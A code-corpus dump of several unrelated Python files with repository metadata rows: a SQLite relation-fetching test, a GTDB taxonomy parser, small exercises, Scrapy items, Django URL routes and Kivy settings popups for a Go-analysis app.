CREATE TABLE test2 (
id INTEGER PRIMARY KEY,
test3_id INTEGER REFERENCES test3
);
''', '''
CREATE TABLE test3 (
id INTEGER PRIMARY KEY
);
''',
]:
self.database.execute(stmt)
return SqliteSchema.create_from_conn(self.database.connection)
@pytest.fixture()
def data_out(self, schema_out):
non_sticky = schema_out.tables[0]
sticky = schema_out.tables[1]
table1 = schema_out.tables[2]
table2 = schema_out.tables[3]
table3 = schema_out.tables[4]
rows = [
(table3, (1,)),
(table3, (2,)),
(table2, (1, 1)),
(table2, (2, 2)),
(sticky, (1, 1)),
(non_sticky, (1, 2)),
(table1, (1, 1, None)),
(table1, (2, None, 1)),
]
self.database.insert_rows(rows)
self.data_everything_except_table2 = (
rows[0:2] + # table 3
rows[4:6] + # sticky and non_sticky
rows[6:8] # table 1
)
self.data_everything_except_table2_non_sticky_row = (
rows[0:2] + # table 3
rows[4:6] + # sticky and non_sticky
rows[6:8] + # table 1
rows[2:3] # table 2, row 1
)
return rows
def test1(self, schema_out, data_out):
# Check fetch without any relations, which won't grab any rows in
# table 2
table = {'table': 'test1'}
self.check_one_subject(schema_out, [table],
self.data_everything_except_table2)
def test2(self, schema_out, data_out):
# Check fetch without sticky relations, which grabs everything
table = {'table': 'test1'}
relation = {'table': 'test2', 'column': 'test3_id'}
self.check_one_subject(schema_out, [table], data_out,
relations=[relation])
def test3(self, schema_out, data_out):
# Check fetch without sticky relations, but flag test2 as sticky
# this should not fetch anything in test2 since there is no sticky
# trail
table = {'table': 'test1'}
def outgoing_sticky_rel(table, col):
return {'table': table, 'column': col, 'sticky': True,
'type': Relation.TYPE_OUTGOING}
relations = [
outgoing_sticky_rel('test1', 'sticky'),
outgoing_sticky_rel('sticky', 'test3_id'),
outgoing_sticky_rel('test2', 'test3_id'),
{'table': 'test2', 'column': 'test3_id', 'sticky': True},
]
self.check_one_subject(
schema_out, [table],
self.data_everything_except_table2_non_sticky_row,
relations=relations)
| 33.273504 | 74 | 0.512972 | 397 | 3,893 | 4.853904 | 0.224181 | 0.060716 | 0.041515 | 0.049299 | 0.371043 | 0.331604 | 0.331604 | 0.314478 | 0.267255 | 0.267255 | 0 | 0.034714 | 0.385821 | 3,893 | 116 | 75 | 33.560345 | 0.771225 | 0.113537 | 0 | 0.244186 | 0 | 0 | 0.253958 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069767 | false | 0 | 0.046512 | 0.011628 | 0.162791 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb1d0fc3b94fe211964f09e6d84f5d3d39abde23 | 6,375 | py | Python | edl/gtdb.py | jmeppley/py-metagenomics | 0dbab073cb7e52c4826054e40eb802c9e0298e9a | [
"MIT"
] | 7 | 2015-05-14T09:36:36.000Z | 2022-03-30T14:32:21.000Z | edl/gtdb.py | jmeppley/py-metagenomics | 0dbab073cb7e52c4826054e40eb802c9e0298e9a | [
"MIT"
] | 1 | 2015-07-14T11:47:25.000Z | 2015-07-17T01:45:26.000Z | edl/gtdb.py | jmeppley/py-metagenomics | 0dbab073cb7e52c4826054e40eb802c9e0298e9a | [
"MIT"
] | 7 | 2015-07-25T22:29:29.000Z | 2022-03-01T21:26:14.000Z | """
Tools for parsing GTDB headers into a taxonomy model
"""
import os
import re
import sys
import logging
from edl.taxon import TaxNode, Taxonomy
from edl.silva import writeDumpFiles
from edl.util import treeGenerator
logger = logging.getLogger(__name__)
GTDB = 'gtdb'
GTDBTAB = 'gtdb_table'
PHYLODB = 'phylodb'
def generate_taxdump(fasta=None, table=None, dump=".", **kwargs):
""" convert a GTDB faa file to ncbi style taxdumps """
if fasta is not None:
tax_file = fasta
fmt = 'fasta'
elif table is not None:
tax_file = table
fmt = 'table'
else:
raise Exception("Please supply 'fasta' or 'table' file")
tax_args = {k: v for k, v in kwargs.items() if k in ['style']}
taxonomy = parse_lineages(tax_file, fmt, **tax_args)
dump_args = {k: v for k, v in kwargs.items() if k in ['map_file_name']}
dump_taxonomy(taxonomy, dump, **dump_args)
def generate_gtdb_lineages_from_table(tax_file):
""" return acc,lineage tuple from file """
with open(tax_file) as table_h:
# skip header
try:
next(table_h)
except StopIteration:
raise Exception("Table is empty!\n" + tax_file)
for line in table_h:
org, _species, lineage = \
[x.strip()
for x in line.split('\t', 4)[:3]]
yield (org, lineage)
def generate_gtdb_lineages(fasta_file):
""" return acc,lineage tuple from file """
with open(fasta_file) as fasta_h:
for line in fasta_h:
if line.startswith(">"):
# in GTDB headers, lineage is second chunk
acc, lineage = line[1:].split(None, 2)[:2]
yield (acc, lineage)
def generate_phylodb_lineages(fasta_file):
""" return acc,lineage tuple from file """
with open(fasta_file) as fasta_h:
for line in fasta_h:
if line.startswith(">"):
# in GTDB headers, lineage is second chunk
acc, lineage = line[1:].split("\t", 2)[:2]
yield (acc, lineage)
def parse_lineages(tax_file, fmt='fasta', style=GTDB):
""" returns taxonomy object """
id_map = {}
root = TaxNode('root', None, None)
tree = {'root': root}
logger.debug("Parsing %s", tax_file)
if style == GTDB:
add_lineage_to_tree = add_gtdb_lineage_to_tree
generate_lineages = generate_gtdb_lineages
else:
add_lineage_to_tree = add_phylodb_lineage_to_tree
generate_lineages = generate_phylodb_lineages
# generate taxonomy tree
for acc, lineage in generate_lineages(tax_file):
# create TaxNode
node = add_lineage_to_tree(lineage, tree)
id_map[acc] = node
logger.debug("Adding id numbers to %d nodes", len(tree))
# assign numeric IDs
i = 0
for node in treeGenerator(root):
i += 1
node.id = i
logger.debug("Added %d id numbers", i)
return Taxonomy(id_map, None, None, tax_file, root)
RANK_LIST = ['domain', 'phylum', 'class',
'order', 'family', 'genus', 'species']
def add_phylodb_lineage_to_tree(lineage, tree):
""" parse given lineage
create new TaxNode objects as needed
assumes that there are 7 elements in lineage, one for each rank
return leaf node """
last_node = tree['root']
sub_lineage = []
if lineage.startswith('Euk'):
# There is an extra entr in the PhyloDB Euk lineages
ranks = [RANK_LIST[0], None] + RANK_LIST[1:]
else:
ranks = RANK_LIST
for rank, taxon_string in zip(ranks, lineage.split(';')):
sub_lineage.append(taxon_string)
taxon = ';'.join(sub_lineage)
try:
last_node = tree[taxon]
except KeyError:
new_node = TaxNode(taxon, last_node.id, rank)
new_node.name = taxon_string
new_node.setParent(last_node)
tree[taxon] = new_node
last_node = new_node
return last_node
RANK_DICT = {'d': 'domain', 'p': 'phylum', 'c': 'class',
'o': 'order', 'f': 'family', 'g': 'genus', 's': 'species'}
def add_gtdb_lineage_to_tree(lineage, tree):
""" parse given lineage
create new TaxNode objects as needed
assumes lineage names atart with x__ where x is a rank abbreviation
return leaf node """
last_node = tree['root']
sub_lineage = []
for taxon_string in lineage.split(';'):
rank_char, taxon_name = taxon_string.split('__')
rank_char = re.sub(r'^_', '', rank_char)
sub_lineage.append(taxon_string)
taxon = ';'.join(sub_lineage)
try:
last_node = tree[taxon]
except KeyError:
try:
rank = RANK_DICT[rank_char]
except KeyError:
print(lineage)
print(rank_char)
exit(-1)
new_node = TaxNode(taxon, last_node.id, rank)
new_node.name = taxon_name
new_node.setParent(last_node)
tree[taxon] = new_node
last_node = new_node
return last_node
def dump_taxonomy(taxonomy, dump_path, map_file_name='gtdb.acc.to.taxid'):
""" generate nodes.dmp and names.dmp """
# Write dump files
if not os.path.exists(dump_path):
os.makedirs(dump_path)
with open(os.path.sep.join((dump_path, 'nodes.dmp')), 'w') as nodes_h:
with open(os.path.sep.join((dump_path, 'names.dmp')), 'w') as names_h:
writeDumpFiles(taxonomy.root, nodes_h, names_h)
# Write hit->tax mapping file
if map_file_name is None:
return
with open(os.path.sep.join((dump_path, map_file_name)),
'w') as acc_map_h:
for (hitid, tax_node) in taxonomy.idMap.items():
acc_map_h.write("%s\t%d\n" % (hitid, tax_node.id))
if __name__ == '__main__':
""" convert a GTDB faa file to ncbi style taxdumps
kw arguments to generate_taxdump passed as args like:
python edl/grdb.py fasta=/path/to/x.faa dump=/path/to/dump
for reference:
generate_taxdump(fasta=None, table=None, dump="."):
"""
kwargs = dict(w.split("=", 1) for w in sys.argv[1:])
logging.basicConfig(level=logging.DEBUG)
logger.debug("args are: %r from:\n%s", kwargs, sys.argv)
# do the work:
generate_taxdump(**kwargs)
| 30.797101 | 78 | 0.604863 | 861 | 6,375 | 4.285714 | 0.221835 | 0.026016 | 0.024661 | 0.018428 | 0.434688 | 0.38103 | 0.350136 | 0.350136 | 0.303252 | 0.249865 | 0 | 0.003491 | 0.281098 | 6,375 | 206 | 79 | 30.946602 | 0.801658 | 0.127059 | 0 | 0.290076 | 0 | 0 | 0.070352 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061069 | false | 0 | 0.053435 | 0 | 0.145038 | 0.015267 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb1e4016be4331d352fd22fa658ec03e7e142dff | 161 | py | Python | Coursera/CICCP1/dezenas.py | marcelomiky/python_code | 4b843c78e16c37e981e4adfe47ae974ee0f2ad81 | [
"MIT"
] | 2 | 2020-10-19T13:53:59.000Z | 2021-08-05T19:48:07.000Z | Coursera/CICCP1/dezenas.py | marcelomiky/PythonCodes | 07f0db8019805b3b9567b7b57ddb49b4333a3aa2 | [
"MIT"
] | null | null | null | Coursera/CICCP1/dezenas.py | marcelomiky/PythonCodes | 07f0db8019805b3b9567b7b57ddb49b4333a3aa2 | [
"MIT"
] | null | null | null | numero_inteiro = int(input("Digite um número inteiro: "))
temp = numero_inteiro // 10
digito_dezena = temp % 10
print("O dígito das dezenas é", digito_dezena)
| 23 | 57 | 0.732919 | 24 | 161 | 4.75 | 0.708333 | 0.22807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029412 | 0.15528 | 161 | 6 | 58 | 26.833333 | 0.808824 | 0 | 0 | 0 | 0 | 0 | 0.298137 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
bb1ea86265c925701352fac69e22fd621159f5e6 | 42 | py | Python | tests/scope.py | ZYAZP/python2 | 7dc3b62eff51e1decb4a408122e77630fdc1687d | [
"MIT"
] | 1,062 | 2015-11-18T01:04:33.000Z | 2022-03-29T07:13:30.000Z | tests/scope.py | ArrowSides/onelinerizer | 7dc3b62eff51e1decb4a408122e77630fdc1687d | [
"MIT"
] | 26 | 2015-11-17T06:58:07.000Z | 2022-01-15T18:11:16.000Z | tests/scope.py | ArrowSides/onelinerizer | 7dc3b62eff51e1decb4a408122e77630fdc1687d | [
"MIT"
] | 100 | 2015-11-17T09:01:22.000Z | 2021-09-12T13:58:28.000Z | x = 2
def foo():
x = 1
foo()
print x
| 6 | 10 | 0.452381 | 9 | 42 | 2.111111 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.380952 | 42 | 6 | 11 | 7 | 0.653846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.2 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4 |
bb1fdf7adb2c4dc824a85213461cdd3a0e0c6c0f | 443 | py | Python | Kalpurnia/items.py | JasonAnx/Kalpurnia | 05760d4d475c6cee9c2158a34bb5fc2c20adb0bf | [
"MIT"
] | 4 | 2017-07-12T06:21:24.000Z | 2018-12-21T15:05:48.000Z | Kalpurnia/items.py | JasonAnx/Kalpurnia | 05760d4d475c6cee9c2158a34bb5fc2c20adb0bf | [
"MIT"
] | null | null | null | Kalpurnia/items.py | JasonAnx/Kalpurnia | 05760d4d475c6cee9c2158a34bb5fc2c20adb0bf | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class Url(scrapy.Item):
# define the fields for your item here like:
key = scrapy.Field()
url = scrapy.Field()
pass
class Posting(scrapy.Item):
# define the fields for your item here like:
posting = scrapy.Field()
url_id = scrapy.Field()
pass | 21.095238 | 51 | 0.668172 | 64 | 443 | 4.609375 | 0.515625 | 0.149153 | 0.108475 | 0.128814 | 0.298305 | 0.298305 | 0.298305 | 0.298305 | 0.298305 | 0.298305 | 0 | 0.002874 | 0.214447 | 443 | 21 | 52 | 21.095238 | 0.844828 | 0.507901 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.222222 | 0.111111 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bb1fea629f2a9e4489bdbe2cada201c3a470df90 | 38 | py | Python | pyqt_helper/__init__.py | morefigs/pyqt-ui-helper | 0f80f8483f57fc58a1c58fb2832094c7931b9fa6 | [
"MIT"
] | 2 | 2019-07-08T22:57:00.000Z | 2022-01-07T10:36:53.000Z | pyqt_helper/__init__.py | morefigs/pyqt-ui-helper | 0f80f8483f57fc58a1c58fb2832094c7931b9fa6 | [
"MIT"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | pyqt_helper/__init__.py | morefigs/pyqt-ui-helper | 0f80f8483f57fc58a1c58fb2832094c7931b9fa6 | [
"MIT"
] | null | null | null | from .pyqt_helper import process_file
| 19 | 37 | 0.868421 | 6 | 38 | 5.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bb20d40fa7052cc2042b31919fc23245949ffc78 | 1,107 | py | Python | MeetmeApp/urls.py | Susan-Kathoni/Meet-Me | 530d14e98a1cb8d14af77397515fe32e31018041 | [
"MIT"
] | null | null | null | MeetmeApp/urls.py | Susan-Kathoni/Meet-Me | 530d14e98a1cb8d14af77397515fe32e31018041 | [
"MIT"
] | null | null | null | MeetmeApp/urls.py | Susan-Kathoni/Meet-Me | 530d14e98a1cb8d14af77397515fe32e31018041 | [
"MIT"
] | null | null | null | from django.urls import path
from django.conf.urls import url, include
from . import views
from django.conf import settings
from django.conf.urls.static import static
from .views import *
urlpatterns=[
path('', views.home, name="home-page"),
path("home/", views.datePage, name="date-page"),
#User URL Routes
# path("register/", views.register, name="register"),
path("profile/", views.profile, name="profile-page"),
path("user/<int:pk>/", views.UserDetail.as_view(), name="user-detail"),
path("block/<int:pk>/", views.blockUser, name="block"),
#Posts URL Routes
path("like/<int:pk>/", views.likePost, name="like"),
path("new-message/<str:username>",views.WriteMessage.as_view(), name="write-message"),
path("view-messages/", views.ViewMessages, name="view-messages"),
path("mark-read/<int:pk>", views.MarkAsRead, name="mark-read"),
path("delete/<int:pk>", views.DeleteMessage.as_view(), name="delete-message")
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT) | 39.535714 | 90 | 0.666667 | 144 | 1,107 | 5.083333 | 0.347222 | 0.034153 | 0.068306 | 0.04918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154472 | 1,107 | 28 | 91 | 39.535714 | 0.782051 | 0.074977 | 0 | 0 | 0 | 0 | 0.223092 | 0.02544 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb218330c462c5abdbf828eb5bc82a026234a3e6 | 14,872 | py | Python | gui/popups.py | Kameone/katrain | 6d2f210a1997bf2f8108ca1c0678df6788867022 | [
"MIT"
] | null | null | null | gui/popups.py | Kameone/katrain | 6d2f210a1997bf2f8108ca1c0678df6788867022 | [
"MIT"
] | null | null | null | gui/popups.py | Kameone/katrain | 6d2f210a1997bf2f8108ca1c0678df6788867022 | [
"MIT"
] | null | null | null | from collections import defaultdict
from typing import Dict, List, DefaultDict, Tuple
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from core.common import OUTPUT_DEBUG, OUTPUT_ERROR
from core.engine import KataGoEngine
from core.game import Game, GameNode
from gui.kivyutils import (
BackgroundLabel,
LabelledCheckBox,
LabelledFloatInput,
LabelledIntInput,
LabelledObjectInputArea,
LabelledSpinner,
LabelledTextInput,
LightHelpLabel,
ScaledLightLabel,
StyledButton,
StyledSpinner,
)
class InputParseError(Exception):
pass
class QuickConfigGui(BoxLayout):
def __init__(self, katrain, popup: Popup, initial_values: Dict = None, **kwargs):
super().__init__(**kwargs)
self.katrain = katrain
self.popup = popup
self.orientation = "vertical"
if initial_values:
self.set_properties(self, initial_values)
@staticmethod
def type_to_widget_class(value):
if isinstance(value, float):
return LabelledFloatInput
elif isinstance(value, bool):
return LabelledCheckBox
elif isinstance(value, int):
return LabelledIntInput
if isinstance(value, dict):
return LabelledObjectInputArea
else:
return LabelledTextInput
def collect_properties(self, widget):
if isinstance(widget, (LabelledTextInput, LabelledSpinner, LabelledCheckBox)):
try:
ret = {widget.input_property: widget.input_value}
except Exception as e:
raise InputParseError(f"Could not parse value for {widget.input_property} ({widget.__class__}): {e}")
else:
ret = {}
for c in widget.children:
for k, v in self.collect_properties(c).items():
ret[k] = v
return ret
def set_properties(self, widget, properties):
if isinstance(widget, (LabelledTextInput, LabelledSpinner)):
key = widget.input_property
if key in properties:
widget.text = str(properties[key])
for c in widget.children:
self.set_properties(c, properties)
class LoadSGFPopup(BoxLayout):
pass
class NewGamePopup(QuickConfigGui):
def __init__(self, katrain, popup: Popup, properties: Dict, **kwargs):
properties["RU"] = KataGoEngine.get_rules(katrain.game.root)
super().__init__(katrain, popup, properties, **kwargs)
self.rules_spinner.values = list(set(self.katrain.engine.RULESETS.values()))
self.rules_spinner.text = properties["RU"]
def new_game(self):
properties = self.collect_properties(self)
self.katrain.log(f"New game settings: {properties}", OUTPUT_DEBUG)
new_root = GameNode(properties={**Game.DEFAULT_PROPERTIES, **properties})
x, y = new_root.board_size
if x > 52 or y > 52:
self.info.text = "Board size too big, should be at most 52"
return
if self.restart.active:
self.katrain.log("Restarting Engine")
self.katrain.engine.restart()
self.katrain("new-game", new_root)
self.popup.dismiss()
class ConfigPopup(QuickConfigGui):
def __init__(self, katrain, popup: Popup, config: Dict, ignore_cats: Tuple = (), **kwargs):
self.config = config
self.ignore_cats = ignore_cats
self.orientation = "vertical"
super().__init__(katrain, popup, **kwargs)
Clock.schedule_once(self.build, 0)
def build(self, _):
props_in_col = [0, 0]
cols = [BoxLayout(orientation="vertical"), BoxLayout(orientation="vertical")]
for k1, all_d in sorted(self.config.items(), key=lambda tup: -len(tup[1])): # sort to make greedy bin packing work better
if k1 in self.ignore_cats:
continue
d = {k: v for k, v in all_d.items() if isinstance(v, (int, float, str, bool)) and not k.startswith("_")} # no lists . dict could be supported but hard to scale
cat = GridLayout(cols=2, rows=len(d) + 1, size_hint=(1, len(d) + 1))
cat.add_widget(Label(text=""))
cat.add_widget(ScaledLightLabel(text=f"{k1} settings", bold=True))
for k2, v in d.items():
cat.add_widget(ScaledLightLabel(text=f"{k2}:"))
cat.add_widget(self.type_to_widget_class(v)(text=str(v), input_property=f"{k1}/{k2}"))
if props_in_col[0] <= props_in_col[1]:
cols[0].add_widget(cat)
props_in_col[0] += len(d)
else:
cols[1].add_widget(cat)
props_in_col[1] += len(d)
col_container = BoxLayout(size_hint=(1, 0.9))
col_container.add_widget(cols[0])
col_container.add_widget(cols[1])
self.add_widget(col_container)
self.info_label = Label(halign="center")
self.apply_button = StyledButton(text="Apply", on_press=lambda _: self.update_config())
self.save_button = StyledButton(text="Apply and Save", on_press=lambda _: self.update_config(save_to_file=True))
btn_container = BoxLayout(orientation="horizontal", size_hint=(1, 0.1), spacing=1, padding=1)
btn_container.add_widget(self.apply_button)
btn_container.add_widget(self.info_label)
btn_container.add_widget(self.save_button)
self.add_widget(btn_container)
def update_config(self, save_to_file=False):
updated_cat = defaultdict(list) # type: DefaultDict[List[str]]
try:
for k, v in self.collect_properties(self).items():
k1, k2 = k.split("/")
if self.config[k1][k2] != v:
self.katrain.log(f"Updating setting {k} = {v}", OUTPUT_DEBUG)
updated_cat[k1].append(k2)
self.config[k1][k2] = v
self.popup.dismiss()
except InputParseError as e:
self.info_label.text = str(e)
self.katrain.log(e, OUTPUT_ERROR)
return
if save_to_file:
self.katrain.save_config()
engine_updates = updated_cat["engine"]
if "visits" in engine_updates:
self.katrain.engine.visits = engine_updates["visits"]
if {key for key in engine_updates if key not in {"max_visits", "max_time", "enable_ownership", "wide_root_noise"}}:
self.katrain.log(f"Restarting Engine after {engine_updates} settings change")
self.info_label.text = "Restarting engine\nplease wait."
self.katrain.controls.set_status(f"Restarted Engine after {engine_updates} settings change.")
def restart_engine(_dt):
old_engine = self.katrain.engine # type: KataGoEngine
old_proc = old_engine.katago_process
if old_proc:
old_engine.shutdown(finish=True)
new_engine = KataGoEngine(self.katrain, self.config["engine"])
self.katrain.engine = new_engine
self.katrain.game.engines = {"B": new_engine, "W": new_engine}
self.katrain.game.analyze_all_nodes() # old engine was possibly broken, so make sure we redo any failures
self.katrain.update_state()
Clock.schedule_once(restart_engine, 0)
self.katrain.debug_level = self.config["debug"]["level"]
self.katrain.update_state(redraw_board=True)
class ConfigAIPopup(QuickConfigGui):
def __init__(self, katrain, popup: Popup, settings):
super().__init__(katrain, popup, settings)
self.settings = settings
Clock.schedule_once(self.build, 0)
def build(self, _):
ais = list(self.settings.keys())
top_bl = BoxLayout()
top_bl.add_widget(ScaledLightLabel(text="Select AI to configure:"))
ai_spinner = StyledSpinner(values=ais, text=ais[0])
ai_spinner.fbind("text", lambda _, text: self.build_ai_options(text))
top_bl.add_widget(ai_spinner)
self.add_widget(top_bl)
self.options_grid = GridLayout(cols=2, rows=max(len(v) for v in self.settings.values()) - 1, size_hint=(1, 7.5), spacing=1) # -1 for help in 1 col
bottom_bl = BoxLayout(spacing=2)
self.info_label = Label()
bottom_bl.add_widget(StyledButton(text=f"Apply", on_press=lambda _: self.update_config(False)))
bottom_bl.add_widget(self.info_label)
bottom_bl.add_widget(StyledButton(text=f"Apply and Save", on_press=lambda _: self.update_config(True)))
self.add_widget(self.options_grid)
self.add_widget(bottom_bl)
self.build_ai_options(ais[0])
def build_ai_options(self, mode):
mode_settings = self.settings[mode]
self.options_grid.clear_widgets()
self.options_grid.add_widget(LightHelpLabel(size_hint=(1, 4), padding=(2, 2), text=mode_settings.get("_help_left", "")))
self.options_grid.add_widget(LightHelpLabel(size_hint=(1, 4), padding=(2, 2), text=mode_settings.get("_help_right", "")))
for k, v in mode_settings.items():
if not k.startswith("_"):
self.options_grid.add_widget(ScaledLightLabel(text=f"{k}"))
self.options_grid.add_widget(ConfigPopup.type_to_widget_class(v)(text=str(v), input_property=f"{mode}/{k}"))
for _ in range(self.options_grid.rows * self.options_grid.cols - len(self.options_grid.children)):
self.options_grid.add_widget(ScaledLightLabel(text=f""))
self.set_properties(self, self.settings)
def update_config(self, save_to_file=False):
try:
for k, v in self.collect_properties(self).items():
k1, k2 = k.split("/")
if self.settings[k1][k2] != v:
self.settings[k1][k2] = v
self.katrain.log(f"Updating setting {k} = {v}", OUTPUT_DEBUG)
if save_to_file:
self.katrain.save_config()
self.popup.dismiss()
except InputParseError as e:
self.info_label.text = str(e)
self.katrain.log(e, OUTPUT_ERROR)
return
self.popup.dismiss()
class ConfigTeacherPopup(QuickConfigGui):
def __init__(self, katrain, popup, **kwargs):
self.settings = katrain.config("trainer")
self.sgf_settings = katrain.config("sgf")
self.ui_settings = katrain.config("board_ui")
super().__init__(katrain, popup, self.settings, **kwargs)
Clock.schedule_once(self.build, 0)
self.spacing = 2
def build(self, _dt):
thresholds = self.settings["eval_thresholds"]
undos = self.settings["num_undo_prompts"]
colors = self.ui_settings["eval_colors"]
thrbox = GridLayout(spacing=1, padding=2, cols=5, rows=len(thresholds) + 1)
thrbox.add_widget(ScaledLightLabel(text="Point loss greater than", bold=True))
thrbox.add_widget(ScaledLightLabel(text="Gives this many undos", bold=True))
thrbox.add_widget(ScaledLightLabel(text="Color (fixed)", bold=True))
thrbox.add_widget(ScaledLightLabel(text="Show dots", bold=True))
thrbox.add_widget(ScaledLightLabel(text="Save in SGF", bold=True))
for i, (thr, undos, color) in enumerate(zip(thresholds, undos, colors)):
thrbox.add_widget(LabelledFloatInput(text=str(thr), input_property=f"eval_thresholds::{i}"))
thrbox.add_widget(LabelledFloatInput(text=str(undos), input_property=f"num_undo_prompts::{i}"))
thrbox.add_widget(BackgroundLabel(background=color[:3]))
thrbox.add_widget(LabelledCheckBox(text=str(color[3] == 1), input_property=f"alpha::{i}"))
thrbox.add_widget(LabelledCheckBox(size_hint=(0.5, 1), text=str(self.sgf_settings["save_feedback"][i]), input_property=f"save_feedback::{i}"))
self.add_widget(thrbox)
xsettings = BoxLayout(size_hint=(1, 0.15), spacing=2)
xsettings.add_widget(ScaledLightLabel(text="Show last <n> dots"))
xsettings.add_widget(LabelledIntInput(size_hint=(0.5, 1), text=str(self.settings["eval_off_show_last"]), input_property="eval_off_show_last"))
self.add_widget(xsettings)
xsettings = BoxLayout(size_hint=(1, 0.15), spacing=2)
xsettings.add_widget(ScaledLightLabel(text="Show dots/SGF comments for AI players"))
xsettings.add_widget(LabelledCheckBox(size_hint=(0.5, 1), text=str(self.settings["eval_show_ai"]), input_property="eval_show_ai"))
self.add_widget(xsettings)
xsettings = BoxLayout(size_hint=(1, 0.15), spacing=2)
xsettings.add_widget(ScaledLightLabel(text="Disable analysis while in teach mode"))
xsettings.add_widget(LabelledCheckBox(size_hint=(0.5, 1), text=str(self.settings["lock_ai"]), input_property="lock_ai"))
self.add_widget(xsettings)
bl = BoxLayout(size_hint=(1, 0.15), spacing=2)
bl.add_widget(StyledButton(text=f"Apply", on_press=lambda _: self.update_config(False)))
self.info_label = Label()
bl.add_widget(self.info_label)
bl.add_widget(StyledButton(text=f"Apply and Save", on_press=lambda _: self.update_config(True)))
self.add_widget(bl)
def update_config(self, save_to_file=False):
try:
for k, v in self.collect_properties(self).items():
if "::" in k:
k1, i = k.split("::")
i = int(i)
if "alpha" in k1:
v = 1.0 if v else 0.0
if self.ui_settings["eval_colors"][i][3] != v:
self.katrain.log(f"Updating alpha {i} = {v}", OUTPUT_DEBUG)
self.ui_settings["eval_colors"][i][3] = v
elif "save_feedback" in k1:
if self.sgf_settings[k1][i] != v:
self.sgf_settings[k1][i] = v
self.katrain.log(f"Updating setting sgf/{k1}[{i}] = {v}", OUTPUT_DEBUG)
else:
if self.settings[k1][i] != v:
self.settings[k1][i] = v
self.katrain.log(f"Updating setting trainer/{k1}[{i}] = {v}", OUTPUT_DEBUG)
else:
if self.settings[k] != v:
self.settings[k] = v
self.katrain.log(f"Updating setting {k} = {v}", OUTPUT_DEBUG)
if save_to_file:
self.katrain.save_config()
self.popup.dismiss()
except InputParseError as e:
self.info_label.text = str(e)
self.katrain.log(e, OUTPUT_ERROR)
return
self.katrain.update_state()
self.popup.dismiss()
